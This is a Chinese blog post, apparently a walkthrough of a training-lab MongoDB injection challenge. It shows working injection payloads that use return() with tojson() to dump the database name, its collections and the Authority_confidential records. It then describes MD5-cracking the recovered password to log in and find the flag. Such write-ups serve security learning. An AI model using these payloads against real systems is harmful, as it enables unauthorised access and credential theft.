SQL手工注入漏洞测试(MongoDB数据库)靶场通关攻略

最新推荐文章于 2024-08-20 22:26:38 发布
最新推荐文章于 2024-08-20 22:26:38 发布
阅读量84 收藏
点赞数
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nai_zui_jiang/article/details/141367805
版权

构造数据回显

'});return ({title:'1',content:'2

成功回显1,2,接下来我们开始尝试查询数据库

'});return({title:tojson(db),content:'2

得到之后我们就可以继续查询他的表名了

'});return({title:tojson(db.getCollectionNames()),content:'2
最后我们就可以爆出他表里的数据了
'});return({title:tojson(db.Authority_confidential.find() [ 0 ] ),content:'2

得到密码之后,我们就可以获得数据了,先将密码进⾏MD5解密,返回登录⻚进⾏登录,划倒⻚⾯最下 端就可以看到KEY了。如果第⼀个⽤户账号密码登录不了,我们就改变查询的索引“find()[1]"查询 其他的⽤户账号密码登录即可
这里显示用户已禁用,那么我们就换一个用户
好了这里我们就登录进去了
嘤嘤奶嘴酱
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 1527
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB数据库)、SQL...
SQL手工注入漏洞测试(MongoDB数据库)——墨者学院
最新发布
A2893992091的博客
08-20 73
表有:Authority_confidential、notice、system.indexes。
15、SQL注入之Oracel、MongoDB注入
山兔的博客
06-21 1422
不同的数据库,它获取信息的注入语句是有点不一样的,如果你不知道这个网站使用的是什么类型的数据库,就一个劲的用mysql注入语句去获取信息,那是无法获取到的,所以我们在判断出注入点的时候,你也得知道这个网站它使用的数据库是什么类型的,这样你才能够根据相关数据库注入语句去获取信息。mongodb它的条件,它的值,在提交数据库注入查询的时候,它是列表形式查询的,键值键名提交进去的,所以我们在注入的时候要考虑到我们的语句是要写到列表里面去,要注入的话,要闭合前面后面的列表,其实就是有符号干扰我们。
Web学习_SQL注入_认识数据库
DonG333_的博客
06-05 766
数据库是结构化信息或数据(一般以电子形式存储在计算机系统 中)的有组织的集合,通常由数据库管理系统 (DBMS)来控制。在现实中,数据、DBMS 及关联应用一起被称为数据库系统,通常简 称为数据库。简单来说,数据库就是一个由一批数据构成的有序集合,这个集合通常被保存为一个或多个彼此相关的文件。以行和列的形式将数据存储在一系列的表中,支 持用户便捷地访问、管理、修改、更新、控制和组织数据。支持 使用结构化查询语言 (SQL) 来编写和查询数据。
API安全学习 - crAPI漏洞靶场与API测试思路
好好睡觉
09-07 2360
crAPI靶场教程、API安全
SQL注入基础-1
x88125E的博客
05-03 1052
sql基础:联合注入,报错注入,盲注。没有任何过滤的情况下!
《磐石计划:Web安全漏洞与渗透测试》笔记
break_cat的博客
02-02 6704
课程:磐石计划:Web安全漏洞与渗透测试 主讲老师:陈殷 课程详情:https://www.cnblogs.com/xuanhun/p/12849767.html 本文内容:磐石计划课堂笔记 引用:课程讲义(作者:陈殷),课程PPT 1.安全概念 1.1初探安全 信息安全 信息安全是指信息网络的硬件、软件及其系统中的数据受到保护,不受偶然的或者恶意的原因而遭到破坏、更改、泄露,系统连续可靠正常地运行,信息服务不中断。 信息安全是一门涉及计算机科学、网络技术、通信技术、密码技术、信息安全技术、应用数学、数.
快速搭建DVWS云靶场
weixin_44016181的博客
09-02 505
简易,快捷,方便的DVWS云靶场搭建教程,快来玩吧!
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
freeking101的博客
07-02 5140
基于 Windows、Linux、Android 的渗透测试系统
mongodb数据库idea测试.zip
04-25
mongodb 数据库基本操作 1、mongoDB的介绍 mongoDB是一个基于分布式文件存储的数据库,由 C++ 语言编写,旨在为 WEB 应用提供可扩展的高性能数据存储解决方案。它介于关系数据库和非关系数据库之间,被认为是非...
1亿条记录的MongoDB数据库随机查询性能测试
12-16
每个进程调用`SqlToMongo`类的`m_sql`方法,通过pymongo连接到MongoDB服务器,查询`syslog`数据库中的`thing`集合,使用`user_id`进行随机查询。脚本通过动态调整进程数量和查询范围来模拟不同的并发和负载情况。 ...
Python实现读取SQLServer数据并插入到MongoDB数据库的方法示例
09-09
在本示例中,我们将探讨如何使用Python编程语言来实现从SQL Server数据库中读取数据,并将这些数据插入到MongoDB数据库中。首先,我们需要了解Python中与这两个数据库交互的相关库:`pyodbc`用于连接和操作SQL ...
老生常谈MongoDB数据库基础操作
12-16
MongoDB是一个流行的非关系型数据库系统,以其灵活性和高性能在现代Web应用中占据了重要的位置。作为NoSQL数据库的一种,MongoDB并不遵循传统的关系型数据库模式,而是采用了基于文档的数据模型,支持BSON(Binary ...
一种基于ANTLR的MongoDB数据库SQL转化模型.pdf
09-19
研究者通过该模型的构建和原型系统的开发,成功地解决了MongoDB缺乏标准SQL访问接口的问题,使得原本熟悉SQL的开发者能够利用熟悉的语法进行数据查询和操作,从而降低了MongoDB数据库的学习曲线,提升了开发效率。...
MongoDB数据库-四书五经-孟子
04-23
MongoDB数据库-四书五经-孟子,导入即可使用 MongoDB数据库-四书五经-孟子,导入即可使用 MongoDB数据库-四书五经-孟子,导入即可使用 MongoDB数据库-四书五经-孟子,导入即可使用 MongoDB数据库-四书五经-孟子,...
MongoDB数据库文件-名言警句集合,导入即可使用
04-25
MongoDB数据库文件-名言警句集合,导入即可使用 MongoDB数据库文件-名言警句集合,导入即可使用 MongoDB数据库文件-名言警句集合,导入即可使用 MongoDB数据库文件-名言警句集合,导入即可使用 MongoDB数据库文件-...
MongoDB数据库应用.docx
09-05
MongoDB 数据库是一种面向文档的数据库系统,使用 C++ 编写,不支持 SQL,但有自己功能强大的查询语法。MongoDB 使用 BSON 作为数据存储和传输的格式。BSON 是一种类似 JSON 的二进制序列化文档,支持嵌套对象和数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值